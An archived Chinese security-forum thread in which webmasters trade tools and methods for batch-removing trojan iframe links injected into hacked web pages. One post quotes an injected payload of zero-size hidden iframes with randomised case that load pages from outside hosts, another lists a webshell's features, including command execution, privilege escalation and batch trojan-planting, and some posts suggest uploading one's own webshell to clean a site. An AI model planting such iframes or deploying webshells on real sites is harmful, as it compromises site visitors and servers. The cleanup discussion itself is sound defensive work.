邪恶八进制信息安全团队技术讨论组 » 技术讨论{ Technique Discussions } » [讨论]寻求反挂马工具 批量清除网页工具 希望有心人提供 [查看完整版本]

scloo 2006-12-12 01:06

[讨论]寻求反挂马工具 批量清除网页工具 希望有心人提供

*** 作者被禁止或删除 内容自动屏蔽 ***

lake2 2006-12-20 15:28

[url]http://www.0x54.org/blog/article.asp?id=294[/url]

这个里面有这个功能

PS：嘿嘿，做个广告而已～～

ddiovedd 2006-12-20 16:07

用Advanced Find and Replace批量替换，速度飞快。

icexiaoye 2006-12-20 16:40

[s:39] 上次有人加我QQ,也是问的这个问题
我也推荐lake2的那东东
帮他做了次推销员啊

小圣 2007-1-27 20:47

不错的软件。。。谢谢各位提供！

pixy 2007-1-27 21:10

对 现在很多站长助手都有这些功能 。。

1、ASP木马查找（能够查出现在几乎所有的ASP木马）
2、文件篡改检查
3、可疑文件搜索
4、Access数据库保护
5、SQL注射防御
6、特殊文件夹检查
7、脚本解密
8、批量反挂马
9、……

其实可以自己上传个大马 查询一下木马文件 然后自己分析是最好的。 [s:39]

seaven 2007-1-27 22:16

反挂马 你怎么搞. 把自己的马的地址挂在首页 还是 入侵他的马的空间地址? [s:68]

bladecj 2007-1-31 21:51

lake2大哥的雷客图ASP站长安全助手确实不错

一口一馒头 2007-2-2 15:49

我知道DreamWeaver有一个高级查找功能，可以查找当前文件夹内出现的指定字串。
你可以尝试着在文件夹内搜索"height=0","iframe","execute","eval"这一类敏感字符（注意选成大小写不敏感，比如偶放一句话马就是换大小写的）

程百万 2007-2-9 18:08

真牛,

我是新手不是很懂,

以后多多学习!

gentlechild 2007-2-11 21:03

雷客图ASP站长安全助手可以，好用啊！

ibm298812 2007-2-14 15:13

对了，可不可以做个批处理出来大家一起学习一下呢．

cncxz 2007-2-14 18:00

我想楼主的问题应该是在所有首页类文件中被插入了<iframe></iframe>

大步 2007-2-16 10:19

我记得火狐的ASA木马可以批量除马

wonderpeng 2007-2-16 12:23

用回ASP木马 查到关键字眼 再全部清空

mcom 2007-2-16 12:29

如果是清除网页内的 <iframe></iframe> 木马，用 Dreamweaver 就可以实现！

风之树叶 2007-2-25 14:42

搞个查找替换工具就行了

cncxz 2007-2-25 22:38

我找到了...你可以去网上找来下载~~

WebShell 4.2 VIP版

->系统服务-用户账号
->终端端口-自动登录
->服务器信息-组件支持
->执行CMD命令
->上传文件
->Servu提权(超强版)
->查找文件-木马
->批量挂马(超强版)
->批量清马(超强版)
->批量替换(超强版)
->批量挂马(普通版)
->文件夹打包-解包器
->读取注册表数据
->端口扫描器



里面有这个功能...想发图发不到~

cncxz 2007-2-26 13:04

WebShell 4.2 VIP版=13VIP

yuewuhen 2007-4-1 14:42

确实有不少站长助手可以批量清理挂马文件，可惜本人不建站未收集此类工具帮不上忙了，见谅！

piaopiao28 2007-4-1 17:04

可以用黑客X档案啊

mingjian987 2007-4-6 22:00

貌似好象没有真正有效的工具吧.
希望哪个牛人写一个思路

heiye88 2007-4-9 09:32

呵呵。。。PHP扫马的有吗。。。

net-owl 2007-4-13 15:01

现在的ASP木马基本都整合了查杀木马的功能了

bink 2007-4-13 19:25

偶准备拿起丢开已久的 VB 写个不用特征码方式进行检测查询的工具。。呵呵。。过两天开始来和大家讨论哈。

cnx 2007-4-14 22:14

其实就是用批量修改后缀的软件把站点下的所有文件修改为txt后缀.
然后再用批处理.或者其他文件处理软件.处理文本里的.一句话马 或者况架
然后再把格式变回来.可行?

pixy 2007-4-14 22:21

不用了，你将计就计。自己传个asp大马，找个有自动清马的大马，把地址加上，木马地址一般都是一样的吧，批量删！

Over...不用什么雷客图那些。

wangfan 2007-4-26 21:04

找个可以查找马的大马,自己挂马在杀马是个不错的办法哦

我爱一条柴 2007-11-22 22:17

貌似是个老帖了，我有个问题，借这个主题问下，帮助一网站清马，马是批量挂的，本来可以用批量清马的工具的。但是这个挂马者用的是随机字母大小写挂的，如：

<iframE src=hTTp://xxx.llxxcx.cn/pv.hTm width=0 Name=&#39;1220&#39; height=0></iframe><iframe src=Http://aa.llsging.com/ww/new05.Htm?075 width=1 namE=&#39;1220&#39; height=1></iframe>

也就是马的地址某个字母大小写，所以这样就没法批量清马了。
问，现在有对大小写不敏感的清马工具么？请各位指点！

skyxnet 2007-11-27 10:17

上传不了附件,

需要的朋友搜索下网络 批量字符修改器

bink 2007-11-27 11:19

[quote]引用第28楼我爱一条柴于2007-11-22 22:17发表的 :
貌似是个老帖了，我有个问题，借这个主题问下，帮助一网站清马，马是批量挂的，本来可以用批量清马的工具的。但是这个挂马者用的是随机字母大小写挂的，如：

<iframE src=hTTp://xxx.llxxcx.cn/pv.hTm width=0 Name=&#39;1220&#39; height=0></iframe><iframe src=Http://aa.llsging.com/ww/new05.Htm?075 width=1 namE=&#39;1220&#39; height=1></iframe>

也就是马的地址某个字母大小写，所以这样就没法批量清马了。
.......[/quote]

你可以将反挂马程序打开，修改其中读取目标文件函数加入 lcase 函数将目标文件中的英文全部转换小写，再将自身的匹配特征码也作相同处理后即刻不区分大小写。

qq66565841 2007-11-29 10:29

[s:269] bink 说的不错。。。我也见过 忽略大小写 的。。。不过好像 是EXE 的。。。

查看完整版本: [讨论]寻求反挂马工具 批量清除网页工具 希望有心人提供

© 1999-2008 EvilOctal Security Team